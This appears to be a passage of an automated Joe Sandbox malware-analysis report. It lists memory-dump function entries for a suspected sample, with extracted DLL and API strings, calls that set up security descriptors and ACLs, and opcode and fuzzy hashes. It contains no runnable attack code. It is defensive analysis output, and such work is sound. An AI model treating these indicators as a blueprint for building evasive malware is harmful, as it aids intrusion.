                                                              0x00861e50
                                                              0x00861e65
                                                              0x00861e6a
                                                              0x00861e83
                                                              0x00861e88
                                                              0x00861ea1
                                                              0x00861ea6
                                                              0x00861eba
                                                              0x00861ebf
                                                              0x00861ed8
                                                              0x00861edd
                                                              0x00861ef6
                                                              0x00861efb
                                                              0x00861f14
                                                              0x00861f19
                                                              0x00861f32
                                                              0x00861f37
                                                              0x00861f50
                                                              0x00861f55
                                                              0x00861f6e
                                                              0x00861f73
                                                              0x00861f8a
                                                              0x00861f8f
                                                              0x00861fa8
                                                              0x00861fad
                                                              0x00861fc4
                                                              0x00861fc9
                                                              0x00861fe2
                                                              0x00861fe7
                                                              0x00862000
                                                              0x00862005
                                                              0x0086201e
                                                              0x00862023
                                                              0x0086203c
                                                              0x00862041
                                                              0x0086205a
                                                              0x0086205f
                                                              0x00862078
                                                              0x0086207d
                                                              0x00862094
                                                              0x00862099
                                                              0x008620aa
                                                              0x008620c4
                                                              0x008620cf
                                                              0x008620d4
                                                              0x008620db
                                                              0x008625eb
                                                              0x008625eb
                                                              0x008625f2
                                                              0x00862600
                                                              0x00862602
                                                              0x00862604
                                                              0x00862604
                                                              0x00862604
                                                              0x00862604
                                                              0x0086260b
                                                              0x00862612
                                                              0x00862620
                                                              0x00862622
                                                              0x00862624
                                                              0x00862624
                                                              0x00862624
                                                              0x00862624
                                                              0x0086262b
                                                              0x00862632
                                                              0x00862640
                                                              0x00862642
                                                              0x00862644
                                                              0x00862644
                                                              0x00862644
                                                              0x00862644
                                                              0x0086264b
                                                              0x00862652
                                                              0x00862660
                                                              0x00862662
                                                              0x00862664
                                                              0x00862664
                                                              0x00862664
                                                              0x00862664
                                                              0x0086266b
                                                              0x00862672
                                                              0x00862680
                                                              0x00862682
                                                              0x00862684
                                                              0x00862684
                                                              0x00862684
                                                              0x00862684
                                                              0x0086268b
                                                              0x00862692
                                                              0x008626a0
                                                              0x008626a2
                                                              0x008626a4
                                                              0x008626a4
                                                              0x008626a4
                                                              0x008626a4
                                                              0x008626bc
                                                              0x008626c1
                                                              0x008626da
                                                              0x008626df
                                                              0x008626f8
                                                              0x008626fd
                                                              0x00862714
                                                              0x00862719
                                                              0x00862732
                                                              0x00862737
                                                              0x00862750
                                                              0x00862755
                                                              0x0086276e
                                                              0x00862773
                                                              0x0086278a
                                                              0x0086278f
                                                              0x008627a8
                                                              0x008627ad
                                                              0x008627c6
                                                              0x008627cb
                                                              0x008627e4
                                                              0x008627e9
                                                              0x00862802
                                                              0x00862807
                                                              0x00862820
                                                              0x00862825
                                                              0x0086283e
                                                              0x00862843
                                                              0x0086285c
                                                              0x00862861
                                                              0x0086287a
                                                              0x0086287f
                                                              0x00862896
                                                              0x0086289b
                                                              0x008628b2
                                                              0x008628b7
                                                              0x008628ce
                                                              0x008628d3
                                                              0x008628ec
                                                              0x008628f1
                                                              0x0086290a
                                                              0x0086290f
                                                              0x00862928
                                                              0x0086292d
                                                              0x00862946
                                                              0x0086294b
                                                              0x00862964
                                                              0x00862969
                                                              0x00862982
                                                              0x00862987
                                                              0x008629a0
                                                              0x008629a5
                                                              0x008629be
                                                              0x008629d4
                                                              0x008629e2
                                                              0x008629ed
                                                              0x008629f8
                                                              0x008629ff
                                                              0x00862a00
                                                              0x00862a05
                                                              0x00862a08
                                                              0x00862a0b
                                                              0x00862a12
                                                              0x00862a20
                                                              0x00862a22
                                                              0x00862a24
                                                              0x00862a24
                                                              0x00862a24
                                                              0x00862a24
                                                              0x00862a2b
                                                              0x00862a32
                                                              0x00862a40
                                                              0x00862a42
                                                              0x00862a44
                                                              0x00862a44
                                                              0x00862a44
                                                              0x00862a44
                                                              0x00862a4b
                                                              0x00862a52
                                                              0x00862a60
                                                              0x00862a62
                                                              0x00862a64
                                                              0x00862a64
                                                              0x00862a64
                                                              0x00862a64
                                                              0x00862a6b
                                                              0x00862a72
                                                              0x00862a80
                                                              0x00862a82
                                                              0x00862a84
                                                              0x00862a84
                                                              0x00862a84
                                                              0x00862a84
                                                              0x00862a8b
                                                              0x00862a92
                                                              0x00862aa0
                                                              0x00862aa2
                                                              0x00862aa4
                                                              0x00862aa4
                                                              0x00862aa4
                                                              0x00862aa4
                                                              0x00862aab
                                                              0x00862ab2
                                                              0x00862ac0
                                                              0x00862ac2
                                                              0x00862ac4
                                                              0x00862ac4
                                                              0x00862ac4
                                                              0x00862ac4
                                                              0x00862adc
                                                              0x00862ae1
                                                              0x00862af8
                                                              0x00862afd
                                                              0x00862b14
                                                              0x00862b19
                                                              0x00862b30
                                                              0x00862b35
                                                              0x00862b4c
                                                              0x00862b51
                                                              0x00862b68
                                                              0x00862b6d
                                                              0x00862b7e
                                                              0x00862b83
                                                              0x00862b94
                                                              0x00862b99
                                                              0x00862ba0
                                                              0x00862bae
                                                              0x00862bb0
                                                              0x00862bb2
                                                              0x00862bb2
                                                              0x00862bb2
                                                              0x00862bb2
                                                              0x00862bb9
                                                              0x00862bc0
                                                              0x00862bce
                                                              0x00862bd0
                                                              0x00862bd2
                                                              0x00862bd2
                                                              0x00862bd2
                                                              0x00862bd2
                                                              0x00862bd9
                                                              0x00862be0
                                                              0x00862bee
                                                              0x00862bf0
                                                              0x00862bf2
                                                              0x00862bf2
                                                              0x00862bf2
                                                              0x00862bf2
                                                              0x00862bf9
                                                              0x00862c00
                                                              0x00862c0e
                                                              0x00862c10
                                                              0x00862c12
                                                              0x00862c12
                                                              0x00862c12
                                                              0x00862c12
                                                              0x00862c19
                                                              0x00862c30
                                                              0x00862c35
                                                              0x00862c3b
                                                              0x00862c51
                                                              0x00862c56
                                                              0x00862c6d
                                                              0x00862c72
                                                              0x00862c89
                                                              0x00862c9f
                                                              0x00862cad
                                                              0x00862cb2
                                                              0x00862cb4
                                                              0x00862cb7
                                                              0x00862cba
                                                              0x00862cca
                                                              0x008620e1
                                                              0x008620e1
                                                              0x008620e1
                                                              0x008620ed
                                                              0x00000000
                                                              0x00000000
                                                              0x008625e1
                                                              0x008625e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x008625e5
                                                              0x008620f9
                                                              0x00862102
                                                              0x0086210b
                                                              0x00862110
                                                              0x00862117
                                                              0x00862127
                                                              0x00862129
                                                              0x00862129
                                                              0x00862130
                                                              0x00862137
                                                              0x00862147
                                                              0x00862149
                                                              0x00862149
                                                              0x00862150
                                                              0x00862157
                                                              0x00862167
                                                              0x00862169
                                                              0x00862169
                                                              0x00862181
                                                              0x00862186
                                                              0x0086219f
                                                              0x008621a4
                                                              0x008621bd
                                                              0x008621c2
                                                              0x008621d9
                                                              0x008621de
                                                              0x008621f7
                                                              0x008621fc
                                                              0x00862215
                                                              0x0086221a
                                                              0x00862233
                                                              0x00862238
                                                              0x00862251
                                                              0x00862256
                                                              0x0086226f
                                                              0x00862274
                                                              0x0086228d
                                                              0x00862292
                                                              0x008622ab
                                                              0x008622b0
                                                              0x008622c9
                                                              0x008622ce
                                                              0x008622e5
                                                              0x008622ea
                                                              0x00862303
                                                              0x00862308
                                                              0x00862321
                                                              0x00862337
                                                              0x00862345
                                                              0x00862350
                                                              0x00862357
                                                              0x00862358
                                                              0x0086235d
                                                              0x00862360
                                                              0x00862363
                                                              0x0086236a
                                                              0x0086237a
                                                              0x0086237c
                                                              0x0086237c
                                                              0x00862383
                                                              0x0086238a
                                                              0x0086239a
                                                              0x0086239c
                                                              0x0086239c
                                                              0x008623a3
                                                              0x008623aa
                                                              0x008623ba
                                                              0x008623bc
                                                              0x008623bc
                                                              0x008623bc
                                                              0x008623bc
                                                              0x008623d4
                                                              0x008623d9
                                                              0x008623f2
                                                              0x008623f7
                                                              0x00862410
                                                              0x00862415
                                                              0x0086242c
                                                              0x00862431
                                                              0x00862448
                                                              0x0086244d
                                                              0x0086245e
                                                              0x00862463
                                                              0x00862474
                                                              0x00862479
                                                              0x00862480
                                                              0x00862490
                                                              0x00862492
                                                              0x00862492
                                                              0x00862499
                                                              0x008624a0
                                                              0x008624b0
                                                              0x008624b2
                                                              0x008624b2
                                                              0x008624b9
                                                              0x008624c0
                                                              0x008624d0
                                                              0x008624d2
                                                              0x008624d2
                                                              0x008624d2
                                                              0x008624d2
                                                              0x008624d9
                                                              0x008624f0
                                                              0x008624f5
                                                              0x0086250e
                                                              0x00862513
                                                              0x0086252c
                                                              0x00862531
                                                              0x0086254a
                                                              0x0086254f
                                                              0x00862566
                                                              0x0086256b
                                                              0x00862582
                                                              0x00862587
                                                              0x00862598
                                                              0x008625ae
                                                              0x008625bc
                                                              0x008625c3
                                                              0x008625c6
                                                              0x008625c9
                                                              0x008625d9
                                                              0x008625d9
                                                              0x008620db
                                                              0x00000000
                                                              0x0085e768
                                                              0x0085e768
                                                              0x0085e76a
                                                              0x0085e76c
                                                              0x0085e76d
                                                              0x00000000
                                                              0x0085e76f
                                                              0x0085e76f
                                                              0x0085e770
                                                              0x0085e771
                                                              0x0085e772
                                                              0x0085e775
                                                              0x0085e776
                                                              0x0085e77b
                                                              0x0085e77e
                                                              0x0085e781
                                                              0x0085e786
                                                              0x0085e78d
                                                              0x0085e797
                                                              0x0085e797
                                                              0x0085e79e
                                                              0x0085ea0b
                                                              0x0085e7a4
                                                              0x0085e7aa
                                                              0x0085e9b4
                                                              0x0085e9bf
                                                              0x0085e9c8
                                                              0x0085e9d2
                                                              0x0085e9dd
                                                              0x0085e9e8
                                                              0x0085e9f3
                                                              0x0085e7b0
                                                              0x0085e7b6
                                                              0x0085e7bf
                                                              0x0085e7c8
                                                              0x0085e7d1
                                                              0x0085e7da
                                                              0x0085e7df
                                                              0x0085e7e5
                                                              0x0085e7ed
                                                              0x0085e7f0
                                                              0x0085e7ff
                                                              0x0085e804
                                                              0x0085e80a
                                                              0x0085e812
                                                              0x0085e815
                                                              0x0085e826
                                                              0x0085e837
                                                              0x0085e83c
                                                              0x0085e842
                                                              0x0085e84a
                                                              0x0085e84d
                                                              0x0085e85e
                                                              0x0085e86f
                                                              0x0085e874
                                                              0x0085e87a
                                                              0x0085e882
                                                              0x0085e885
                                                              0x0085e896
                                                              0x0085e8a7
                                                              0x0085e8ac
                                                              0x0085e8b2
                                                              0x0085e8ba
                                                              0x0085e8bd
                                                              0x0085e8ce
                                                              0x0085e8df
                                                              0x0085e8f1
                                                              0x0085e902
                                                              0x0085e907
                                                              0x0085e90d
                                                              0x0085e915
                                                              0x0085e918
                                                              0x0085e929
                                                              0x0085e93a
                                                              0x0085e93f
                                                              0x0085e945
                                                              0x0085e94d
                                                              0x0085e950
                                                              0x0085e961
                                                              0x0085e972
                                                              0x0085e977
                                                              0x0085e97d
                                                              0x0085e985
                                                              0x0085e988
                                                              0x0085e999
                                                              0x0085e9a7
                                                              0x0085e9a7
                                                              0x0085e9fe
                                                              0x0085e9fe
                                                              0x0085ea16
                                                              0x0085ea21
                                                              0x0085ea2f
                                                              0x0085ed65
                                                              0x0085ea35
                                                              0x0085ea43
                                                              0x0085ed0b
                                                              0x0085ed16
                                                              0x0085ed21
                                                              0x0085ed37
                                                              0x0085ed42
                                                              0x0085ed58
                                                              0x0085ea49
                                                              0x0085ea4f
                                                              0x0085ea62
                                                              0x0085ea67
                                                              0x0085ea6d
                                                              0x0085ea75
                                                              0x0085ea78
                                                              0x0085ea87
                                                              0x0085ea8c
                                                              0x0085ea92
                                                              0x0085ea9a
                                                              0x0085ea9d
                                                              0x0085eaae
                                                              0x0085eabf
                                                              0x0085eac4
                                                              0x0085eaca
                                                              0x0085ead2
                                                              0x0085ead5
                                                              0x0085eae6
                                                              0x0085eaf7
                                                              0x0085eafc
                                                              0x0085eb02
                                                              0x0085eb0a
                                                              0x0085eb0d
                                                              0x0085eb1e
                                                              0x0085eb2f
                                                              0x0085eb34
                                                              0x0085eb3a
                                                              0x0085eb42
                                                              0x0085eb45
                                                              0x0085eb56
                                                              0x0085eb67
                                                              0x0085eb6c
                                                              0x0085eb72
                                                              0x0085eb7a
                                                              0x0085eb7d
                                                              0x0085eb8e
                                                              0x0085eb9f
                                                              0x0085eba4
                                                              0x0085ebaa
                                                              0x0085ebb2
                                                              0x0085ebb5
                                                              0x0085ebc6
                                                              0x0085ebd7
                                                              0x0085ebdc
                                                              0x0085ebe2
                                                              0x0085ebea
                                                              0x0085ebed
                                                              0x0085ebfe
                                                              0x0085ec0f
                                                              0x0085ec21
                                                              0x0085ec32
                                                              0x0085ec37
                                                              0x0085ec3d
                                                              0x0085ec45
                                                              0x0085ec48
                                                              0x0085ec59
                                                              0x0085ec6a
                                                              0x0085ec6f
                                                              0x0085ec75
                                                              0x0085ec7d
                                                              0x0085ec80
                                                              0x0085ec91
                                                              0x0085eca2
                                                              0x0085eca7
                                                              0x0085ecad
                                                              0x0085ecb5
                                                              0x0085ecb8
                                                              0x0085ecc9
                                                              0x0085ecd7
                                                              0x0085ece2
                                                              0x0085ecef
                                                              0x0085ecfc
                                                              0x0085ecfc
                                                              0x0085ea43
                                                              0x0085ed70
                                                              0x0085ed80
                                                              0x0085ed8a
                                                              0x0085ed8a
                                                              0x0085ed80
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $,`_L$EP0NS411.DLL$FXSCOM.dll$IMEPADSM.DLL$NetLocalGroupGetInfo$NetSessionDel$NlsLexicons001a.dll$api-ms-win-crt-process-l1-1-0.dll$f3ahvoas.dll$mscat32.dll$secur32.dll$systemcpl.dll$wmpshell.dll$wow32.dll
                                                              • API String ID: 0-1827554731
                                                              • Opcode ID: eb116362f46ec99cb0b42e9def089c68c2e2ee596d9b925e802fe5509ede81fc
                                                              • Instruction ID: 0f1591226680140fbd15c03a1ba7c1fbb519c8ba427debd44d09a04df11d47ff
                                                              • Opcode Fuzzy Hash: eb116362f46ec99cb0b42e9def089c68c2e2ee596d9b925e802fe5509ede81fc
                                                              • Instruction Fuzzy Hash: D7A38D3490929A8FDB11DF64D890BDCBBB2FF4A308F0050E6D488A7762D7356A99CF15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 006BA8DC Relevance: 69.0, Strings: 52, Instructions: 3995COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $=$GetACP$GlobalReAlloc$J$KBDKAZ.DLL$Microsoft.Build.Framework.dll$Microsoft.Office.BusinessApplications.Runtime.intl.resources.dll$NetGetDisplayInformationIndex$NlsData001a.dll$NlsData0022.dll$PerfCounter.dll$PlaMig.dll$R$RtlCreateServiceSid$RtlQueryHeapInformation$System.Xml.dll$V$VarUI2FromCy$WMPEncEn.dll$WmiQueryAllDataA$XamlViewer_v0300.exe$acwow64.dll$api-ms-win-core-debug-l1-1-0.dll$api-ms-win-core-processthreads-l1-1-1.dll$api-ms-win-core-string-l1-1-0.dll$colorcpl.exe$comadmin.dll$evntcmd.exe$helpcins.dll$msctfui.dll$srcore.dll$wertyuiopasdfghjklzxcvbnm$wmiutils.dll$wudriver.dll
                                                              • API String ID: 0-1618126529
                                                              • Opcode ID: 10c136151ee4f2069b0dafc05781bd4c9fbc7b5384318e964855b9067dde7ae7
                                                              • Instruction ID: e1bfc7529476952224456319fd71e6d4f0e63e04ef81fae256565360bd5caaf2
                                                              • Opcode Fuzzy Hash: 10c136151ee4f2069b0dafc05781bd4c9fbc7b5384318e964855b9067dde7ae7
                                                              • Instruction Fuzzy Hash: 44930274A0425D8FDB10DFA4DC81BDDBBF5FB09308F1090AAD408A7662E734AA89DF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0087C50C Relevance: 53.6, APIs: 6, Strings: 24, Instructions: 1075COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,0087DC05,?,00000000,00000000,?,0089A05A,FDE44ACE,?,?,0089B6AC,?,00000074,008B08D8), ref: 0087C539
                                                              • InitializeAcl.ADVAPI32(00000000,00000400,00000002,?,00000000,00000000,?,0089A05A,FDE44ACE,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC), ref: 0087C637
                                                              • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,00000074,?,0000000E,?,00000000,00000000,?,0089A05A,FDE44ACE,?,?,0089B6AC,?), ref: 0087C755
                                                              • CreateWellKnownSid.ADVAPI32(00000001,00000000,?,00000074,00000006,008A9B84,00000006,008A9B7C,00000006,008A9A38,00000006,00000006,008A9B6C,00000006,00000006,008A9AF0), ref: 0087C90F
                                                              • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,?,?,00000000,00000000,?,0089A05A,FDE44ACE,?,?,0089B6AC,?,00000074,008B08D8), ref: 0087C92C
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000,?,0000000E,?,00000000,00000000,?,0089A05A,FDE44ACE,?,?,0089B6AC,?), ref: 0087C9A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: CreateDescriptorInitializeKnownSecurityWell$AccessAllowedDacl
                                                              • String ID: $ $ $ $ $ $,`_L$BdeHdCfg.exe$CallNextHookEx$EnumerateTraceGuidsEx$GetEnabledXStateFeatures$KBDSMSNO.DLL$MessageBoxA$NlsLexicons0027.dll$NtThawRegistry$TSpkg.dll$TpCallbackUnloadDllOnCompletion$`$aepic.dll$api-ms-win-core-libraryloader-l1-1-0.dll$dwmapi.dll$logoncli.dll$netstandard.dll$rdpcorets.dll
                                                              • API String ID: 2450134216-3026993553
                                                              • Opcode ID: 511310ba4730daa6851b64ac9285cd0dba335a4c9a7894692d693002ef960081
                                                              • Instruction ID: 3992e1403e9b5c8776297243210fc0ecee483a309be43561978049566767cd83
                                                              • Opcode Fuzzy Hash: 511310ba4730daa6851b64ac9285cd0dba335a4c9a7894692d693002ef960081
                                                              • Instruction Fuzzy Hash: 6BB23534A1521DCFDB00EFA4D881BDDB7B6FF49304F108066E844B7695D738AA4ACB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0088C79C Relevance: 43.8, Strings: 33, Instructions: 2529COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ ^$KBDUZB.DLL$PCLXL.DLL$RegGetValueW$System.Web.DynamicData.Design.dll$VariantCopyInd$dsprov.dll$dwmapi.dll$mmcshext.dll$raserver.exe$ttt$wow64.dll$wuapi.dll
                                                              • API String ID: 0-318621285
                                                              • Opcode ID: 771b376b7f97c8601e1a52d5fcbe12d0c22f26bd464a0fa7d94e8ee5eb1d9979
                                                              • Instruction ID: 507a208060b2461cba0364fdbe80c7954836aa0660f1ce3053646711b380dff6
                                                              • Opcode Fuzzy Hash: 771b376b7f97c8601e1a52d5fcbe12d0c22f26bd464a0fa7d94e8ee5eb1d9979
                                                              • Instruction Fuzzy Hash: 2E537E3490829E8FDB11DF64D890BDDBBB5BF0A308F1040E6D448B77A2D634AA99CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008770C4 Relevance: 24.6, Strings: 19, Instructions: 835COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $/$CasPol.exe$GetClassInfoExW$IMJPCLST.DLL$Microsoft.Build.Conversion.v3.5.dll$Microsoft.MediaCenter.iTV.dll$PostMig.exe$ZwReadOnlyEnlistment$cmi2migxml.dll$evntagnt.dll$msra.exe$secur32.dll$shwebsvc.dll$usercpl.dll$wpcmig.dll
                                                              • API String ID: 0-598829326
                                                              • Opcode ID: 5d5b376437f2a9b3a42bc52104574d10f0b344bae16a8f077b124a3af5015a8e
                                                              • Instruction ID: 7c2c6b43ff34d7cd941693466faf59132d87e8d94f3068a3a5c03bd831f8545c
                                                              • Opcode Fuzzy Hash: 5d5b376437f2a9b3a42bc52104574d10f0b344bae16a8f077b124a3af5015a8e
                                                              • Instruction Fuzzy Hash: 7182E63491424E8FDB00DFA5C982BEEBBB5FF49304F108066E504B7295D734AE5ACB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040CE84 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299), ref: 0040CEA1
                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040CEB2
                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?), ref: 0040CFB2
                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019), ref: 0040CFC4
                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000), ref: 0040CFD0
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?,?,0040D1BB,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales), ref: 0040D015
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                              • API String ID: 1930782624-3908791685
                                                              • Opcode ID: 513bc97edc3a285b3f4b4213d583ed833790a0ac4b592b607f87561b17950973
                                                              • Instruction ID: 72a2b02610064fb6e64a347f8dccdb3cbd3b5c5928c9e3bd0ad0754b881fd8bf
                                                              • Opcode Fuzzy Hash: 513bc97edc3a285b3f4b4213d583ed833790a0ac4b592b607f87561b17950973
                                                              • Instruction Fuzzy Hash: E041A031E00619DBCB10EBA4CC85ADEB3B9EF44314F5486BA9544F72C1E77C9E468B89
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008799FF Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 476COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $ $dpnlobby.dll
                                                              • API String ID: 0-584038093
                                                              • Opcode ID: 4fcf8aecb6c4dd7e887d350c18a81c36cb5dfc523fbe96cafe5bbf09f2af229b
                                                              • Instruction ID: bae1e69e6083ae284282e570cb1da161308b38c74c86f68681f2930064ed2e58
                                                              • Opcode Fuzzy Hash: 4fcf8aecb6c4dd7e887d350c18a81c36cb5dfc523fbe96cafe5bbf09f2af229b
                                                              • Instruction Fuzzy Hash: 2A324C34909269CFEB00DFA8E981ADDBBF5FB4A314F104066E485E7B61D734A942CF15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00889622 Relevance: 11.9, Strings: 9, Instructions: 698COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $ $ $NlsLexicons0007.dll$WMPEncEn.dll$WcsPlugInService.dll$imkrhjd.dll$msjter40.dll
                                                              • API String ID: 0-2932531965
                                                              • Opcode ID: f4a6143c48d78da2b6443c7aad68d7d5eac5de959938cf87e16649466a65ddb2
                                                              • Instruction ID: bf32a8490e79fe6a535159b72d7fe53985cf89a186e1cfd71ff2ee7a7cb9dae1
                                                              • Opcode Fuzzy Hash: f4a6143c48d78da2b6443c7aad68d7d5eac5de959938cf87e16649466a65ddb2
                                                              • Instruction Fuzzy Hash: 307227349042598FDB11EF60C885BCDB7BABF4A308F5080E6D448B7252DB75AE89CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0087A511 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 482encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0087AD6C,?,?,?,00000000,0087B0A4,?,?,?,?,00000000,00000000), ref: 0087AC4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
